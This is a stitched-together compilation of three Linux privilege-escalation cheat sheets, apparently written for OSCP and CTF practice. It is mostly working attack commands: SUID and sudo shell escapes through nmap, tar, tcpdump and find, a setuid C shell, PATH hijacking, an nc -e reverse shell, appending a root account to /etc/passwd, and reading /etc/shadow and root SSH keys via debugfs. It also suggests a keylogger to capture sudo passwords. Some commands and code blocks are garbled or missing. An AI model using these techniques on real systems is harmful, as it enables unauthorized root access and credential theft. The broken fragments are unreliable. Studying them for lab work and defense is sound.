Local privilege escalation linux

Privilege Escalation on Linux Platform

Mar 27, 2020 · 5 min read

In this article, I will note and organize some privilege escalation skills used in my OSCP lab. Some are straightforward but fews are tricky. You have to refresh your brain and turn a corner. Before reading it, I highly recommend you to check g0tmi1t’s blog for basic Linux privilege escalation. Here comes the URL: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

\x01 Kernel Exploit

For kernel exploit, you have to identify the k ernel version and what distribution you used. You can type the following command to do it, and then search any related exploits on exploit DB, wget it, fix it, compile it and execute it. Here comes the commands to identify the kernel version and your distribution:

$ uname -a
$ cat /etc/issue
$ cat /etc/*-release
$ cat /etc/lsb-release
$ cat /etc/redhat-release
$ lsb_release

In most cases, you can use sendpage and dirtycow both kernel exploits to do privilege escalation. And I would like to list two kernel exploits worth mentioned here.

The first one is udev kernel exploit. You can refer the following Mad Irish’s article.

Udev Exploit Allows Local Privilege Escalation

A nasty new udev vulnerability is floating around in the wild that allows local users on Linux systems with udev and…

The second one is regarding ReiserFS xattr vulnerability. If you see any folder mounted with reiserfs file system with xattr attribute set, it’s worth to give it a try. Here comes the reference link:

Offensive Security’s Exploit Database Archive

usr/bin/env python »’ team-edward.py Linux Kernel http://jon.oberheide.org Information…

\x02 Exploit the service running as root

There are 2 cases I encountered in OSCP lab are Samba 2.2.x and MySQL.

For Samba 2.2.x, please check the following link:

Offensive Security’s Exploit Database Archive

Samba /dev/null
$ find / -perm -2000 2>/dev/null

If you find the following command with SUID/SGID permission, perfect, you almost win.

Another way below (if nmap doesn’t have interactive mode):
($ echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse)
($ sudo nmap —script=/tmp/shell.nse)

python

strace

tcpdump

$ echo $’id\ncat /etc/shadow’ > /tmp/.shell
$ chmod +x /tmp/.shell
$ tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

If you find out one script file with SUID permission, owned by root and executable by others, and this script file will execute some commands. You can play the trick to get root shell. For example here, this script will execute scp command transferring some backup file to somewhere. Add . into $PATH and compile setuid.c, rename the compiled binary to scp and put it under current folder. And then run that script.

$ export PATH=.:$PATH
$ cat setuid.c
#include
int main(void)
<
setuid(0); setgid(0); seteuid(0); setegid(0); execvp(“/bin/sh”, NULL, NULL);
>
$ mv setuid scp
$ ./script.sh

\x04 Abuse SUDO

Use the following command to show which command have allowed to the current user.

And if you find the following command with NOPASSWD and root set in the output. You win again .
zip

$ sudo zip /tmp/test.zip /tmp/test -T —unzip-command=”sh -c /bin/bash”

$ sudo tar cf /dev/null testfile —checkpoint=1 — checkpointaction=exec=/bin/bash

strace

tcpdump

$ echo $’id\ncat /etc/shadow’ > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

$ echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse
$ sudo nmap —script=/tmp/shell.nse

Another way below:
($ sudo nmap —interactive
nmap> !sh)

except

$ sudo except spawn sh then sh

gdb/ftp

\x05 Find any writable file owned by root

Please use the following command to find any writable files owned by root. You might be able to see the script file and add the needed command for your privilege escalation.

$ find / -perm -002 -user root -type f -not-path “/proc/*” 2>/dev/null

\x06 Check /etc/passwd if writable

If you see /etc/passwd is writable, the only thing you should do is to echo one line to /etc/passed

$ echo “tseruser::0:0:pawned:/root:/bin/bash” >> /etc/passwd
$ su testuser

\x07 NFS root squashing

According Wikipedia, root squash is a special mapping of the remote superuser (root) identity when using identity authentication (local user is the same as remote user). Under root squash, a client’s uid 0 (root) is mapped to 65534 (nobody). It is primarily a feature of NFS but may be available on other systems as well.

In the scenario which you use showmount to find your target has NFS service up and running and you’re already in via anyway and you find you have the permission to edit /etc/exports as well, for example, you can use sudoedit to edit /etc/exports. You can put no_root_squash to disable root squash. Please see below:

And then you can mount this folder with local root and put the copy of /bin/bash into it. After this, try use the exploited normal account to execute this /bin/bash. You will get the heaven .

\x08 Useful tools

In the final section, I will introduce 3 useful tools for your PE. These tools can check and enumerate your target, show rich information for your PE on Linux platform.

Источник

Privilege Escalation

Once we have a limited shell it is useful to escalate that shells privileges. This way it will be easier to hide, read and write any files, and persist between reboots.

In this chapter I am going to go over these common Linux privilege escalation techniques:

• Kernel exploits
• Programs running as root
• Installed software
• Weak/reused/plaintext passwords
• Inside service
• Suid misconfiguration
• Abusing sudo-rights
• World writable scripts invoked by root
• Bad path configuration
• Cronjobs
• Unmounted filesystems

Enumeration scripts

I have used principally three scripts that are used to enumerate a machine. They are some difference between the scripts, but they output a lot of the same. So test them all out and see which one you like best.

LinEnum

Here are the options:

Unix privesc

http://pentestmonkey.net/tools/audit/unix-privesc-check
Run the script and save the output in a file, and then grep for warning in it.

Linprivchecker.py

Privilege Escalation Techniques

Kernel Exploits

By exploiting vulnerabilities in the Linux Kernel we can sometimes escalate our privileges. What we usually need to know to test if a kernel exploit works is the OS, architecture and kernel version.

Check the following:

Search for exploits

Don’t use kernel exploits if you can avoid it. If you use it it might crash the machine or put it in an unstable state. So kernel exploits should be the last resort. Always use a simpler priv-esc if you can. They can also produce a lot of stuff in the sys.log . So if you find anything good, put it up on your list and keep searching for other ways before exploiting it.

Programs running as root

The idea here is that if specific service is running as root and you can make that service execute commands you can execute commands as root. Look for webserver, database or anything else like that. A typical example of this is mysql, example is below.

Check which processes are running

Mysql

If you find that mysql is running as root and you username and password to log in to the database you can issue the following commands:

If neither of those work you can use a User Defined Function/

User Installed Software

Has the user installed some third party software that might be vulnerable? Check it out. If you find anything google it for exploits.

Weak/reused/plaintext passwords

• Check file where webserver connect to database ( config.php or similar)
• Check databases for admin passwords that might be reused
• Check weak passwords

• Check plaintext password

Service only available from inside

It might be that case that the user is running some service that is only available from that host. You can’t connect to the service from the outside. It might be a development server, a database, or anything else. These services might be running as root, or they might have vulnerabilities in them. They might be even more vulnerable since the developer or user might be thinking «since it is only accessible for the specific user we don’t need to spend that much of security».

Check the netstat and compare it with the nmap-scan you did from the outside. Do you find more services available from the inside?

Suid and Guid Misconfiguration

When a binary with suid permission is run it is run as another user, and therefore with the other users privileges. It could be root, or just another user. If the suid-bit is set on a program that can spawn a shell or in another way be abuse we could use that to escalate our privileges.

For example, these are some programs that can be used to spawn a shell:

If these programs have suid-bit set we can use them to escalate privileges too. For more of these and how to use the see the next section about abusing sudo-rights:

Find suid and guid files

Abusing sudo-rights

If you have a limited shell that has access to some programs using sudo you might be able to escalate your privileges with. Any program that can write or overwrite can be used. For example, if you have sudo-rights to cp you can overwrite /etc/shadow or /etc/sudoers with your own malicious file.

cp
Copy and overwrite /etc/shadow

The text/binary-editor HT.

From less you can go into vi, and then into a shell.

You need to run more on a file that is bigger than your screen.

Overwrite /etc/shadow or /etc/sudoers

Can be abused like this:

World writable scripts invoked as root

If you find a script that is owned by root but is writable by anyone you can add your own malicious code in that script that will escalate your privileges when the script is run as root. It might be part of a cronjob, or otherwise automatized, or it might be run by hand by a sysadmin. You can also check scripts that are called by these scripts.

Bad path configuration

Putting . in the path
If you put a dot in your path you won’t have to write ./binary to be able to execute it. You will be able to execute any script or binary that is in the current directory.

Why do people/sysadmins do this? Because they are lazy and won’t want to write ./.

Cronjob

With privileges running script that are editable for other users.

Look for anything that is owned by privileged user but writable for you:

Unmounted filesystems

Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again.

NFS Share

If you find that a machine has a NFS share you might be able to use that to escalate privileges. Depending on how it is configured.

If that succeeds then you can go to /tmp/share . There might be some interesting stuff there. But even if there isn’t you might be able to exploit it.

If you have write privileges you can create files. Test if you can create files, then check with your low-priv shell what user has created that file. If it says that it is the root-user that has created the file it is good news. Then you can create a file and set it with suid-permission from your attacking machine. And then execute it with your low privilege shell.

This code can be compiled and added to the share. Before executing it by your low-priv user make sure to set the suid-bit on it, like this:

Steal password through a keylogger

If you have access to an account with sudo-rights but you don’t have its password you can install a keylogger to get it.

Other useful stuff related to privesc

World writable directories

Источник

Local privilege escalation linux

Tips and Tricks for Linux Priv Escalation

Start with the basics

Who am i and what groups do I belong to?
id

Who else is on this box (lateral movement)?
ls -la /home
cat /etc/passwd

What Kernel version and distro are we working with here?
uname -a
cat /etc/issue

What new processes are running on the server (Thanks to IPPSEC for the script!):

We can also use pspy on linux to monitor the processes that are starting up and running:
https://github.com/DominicBreuker/pspy

Check the services that are listening:

What can we EXECUTE?

Who can execute code as root (probably will get a permission denied)?
cat /etc/sudoers

Can I execute code as root (you will need the user’s password)?
sudo -l

What executables have SUID bit that can be executed as another user?
find / -type f -user root -perm /u+s -ls 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb <> \;

Do any of the SUID binaries run commands that are vulnerable to file path manipulation?
strings /usr/local/bin/binaryelf
mail
echo «/bin/sh» > /tmp/mail cd /tmp
export PATH=.
/usr/local/bin/binaryelf

Do any of the SUID binaries run commands that are vulnerable to Bash Function Manipulation? strings /usr/bin/binaryelf
mail function /usr/bin/mail() < /bin/sh; >
export -f /usr/bin/mail
/usr/bin/binaryelf

Can I write files into a folder containing a SUID bit file?
Might be possible to take advantage of a ‘.’ in the PATH or an The IFS (or Internal Field Separator) Exploit.

If any of the following commands appear on the list of SUID or SUDO commands, they can be used for privledge escalation:

SUID / SUDO Executables	Priv Esc Command (will need to prefix with sudo if you are using sudo for priv esc.
(ALL : ALL ) ALL	You can run any command as root. sudo su — sudo /bin/bash
nmap (older versions 2.02 to 5.21)	nmap —interactive !sh
netcat nc nc.traditional	nc -nlvp 4444 & nc -e /bin/bash 127.0.0.1 4444
ncat
awk gawk	awk ‘< print >‘ /etc/shadow awk ‘BEGIN ‘
python	python -c ‘import pty;pty.spawn(«/bin/bash»)’
php
find	find /home -exec nc -lvp 4444 -e /bin/bash \; find /home -exec /bin/bash \;
xxd
vi
more
less
nano
cp
cat
bash
ash
sh
csh
curl
dash
pico
nano
vrim
tclsh
git
scp
expect
ftp
socat
script
ssh
zsh
tclsh
strace	Write and compile a a SUID SUID binary c++ program strace chown root:root suid strace chmod u+s suid ./suid
npm	ln -s /etc/shadow package.json && sudo /usr/bin/npm i *
rsync
tar
Screen-4.5.00	https://www.exploit-db.com/exploits/41154/

Note: You can find an incredible list of Linux binaries that can lead to privledge escalation at the GTFOBins project website here:
https://gtfobins.github.io/

Can I access services that are running as root on the local network?
netstat -antup
ps -aux | grep root

Network Services Running as Root	Exploit actions
mysql	raptor_udf2 exploit 0xdeadbeef.info/exploits/raptor_udf2.c insert into foo values(load_file(‘/home/smeagol/raptor_udf2.so’));
apache	drop a reverse shell script on to the webserver
nfs	no_root_squash parameter Or if you create the same user name and matching user id as the remote share you can gain access to the files and write new files to the share
PostgreSQL	https://www.exploit-db.com/exploits/45184/

Are there any active tmux sessions we can connect to?
tmux ls

What can we READ?

What files and folders are in my home user’s directory?
ls -la

Do any users have passwords stored in the passwd file? cat /etc/passwd

Are there passwords for other users or RSA keys for SSHing into the box?
ssh -i id_rsa root@10.10.10.10

Are there configuration files that contain credentials?

Application and config file	Config File Contents
WolfCMS config.php	// Database settings: define(‘DB_DSN’, ‘mysql:dbname=wolf;host=localhost;port=3306’); define(‘DB_USER’, ‘root’); define(‘DB_PASS’, ‘john@123’);
Generic PHP Web App	define(‘DB_PASSWORD’, ‘s3cret’);
.ssh directory	authorized_keys id_rsa id_rsa.keystore id_rsa.pub known_hosts
User MySQL Info	.mysql_history .my.cnf
User Bash History	.bash_history

Are any of the discovered credentials being reused by multiple acccounts?
sudo — username
sudo -s

Are there any Cron Jobs Running?
cat /etc/crontab

What files have been modified most recently?
find /etc -type f -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort -r
find /home -type f -mmin -60
find / -type f -mtime -2

Is the user a member of the Disk group and can we read the contents of the file system?
debugfs /dev/sda
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow

Is the user a member of the Video group and can we read the Framebuffer?
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size

Where can we WRITE?

What are all the files can I write to?
find / -type f -writable -path /sys -prune -o -path /proc -prune -o -path /usr -prune -o -path /lib -prune -o -type d 2>/dev/null

What folder can I write to?
find / -regextype posix-extended -regex «/(sys|srv|proc|usr|lib|var)» -prune -o -type d -writable 2>/dev/null

Writable Folder / file	Priv Esc Command
/home/USER/	Create an ssh key and copy it to the .ssh/authorized_keys folder the ssh into the account
/etc/passwd	manually add a user with a password of «password» using the following syntax user:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:1000:1000. /home/user:/bin/bash You can even escalate to the root user in some cases with the following syntax: admin:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:0:0. /root:/bin/bash

Root SSH Key If Root can login via SSH, then you might be able to find a method of adding a key to the /root/.ssh/authorized_keys file.

Add SUDOers If we can write arbitrary files to the host as Root, it is possible to add users to the SUDO-ers group like so (NOTE: you will need to logout and login again as myuser):
/etc/sudoers

Set Root Password We can also change the root password on the host if we can write to any file as root:
/etc/shadow

Based on the Kernel version, do we have some reliable exploits that can be used?

UDEV — Linux Kernel

Automated Linux Enumeration Scripts

It is always a great idea to automate the enumeration process once you understand what you are looking for.

LinEnum is a handy method of automating Linux enumeration. It is also written as a shell script and does not require any other intpreters (Python,PERL etc.) which allows you to run it file-lessly in memory.

First we need to git a copy to our local Kali linux machine:

Next we can serve it up in the python simple web server:

And now on our remote Linux machine we can pull down the script and pipe it directly to Bash:

And the enumeration script should run on the remote machine.

CTF Machine Tactics

Often it is easy to identify when a machine was created by the date / time of file edits. We can create a list of all the files with a modify time in that timeframe with the following command:

This has helped me to find interesting files on a few different CTF machines.

Recursively searching for passwords is also a handy technique:

Wget Pipe a remote URL directory to Bash (linpeas):

Curl Pipe a remote URL directly to Bash (linpeas):

Often, we are provided with password protected SSH keys on CTF boxes. It it helpful to be able to quicky crack and add these to your private keys.

First we need to convert the ssh key using John:

Next we will need to use that format to crack the password:

John should output a password for the private key.

Источник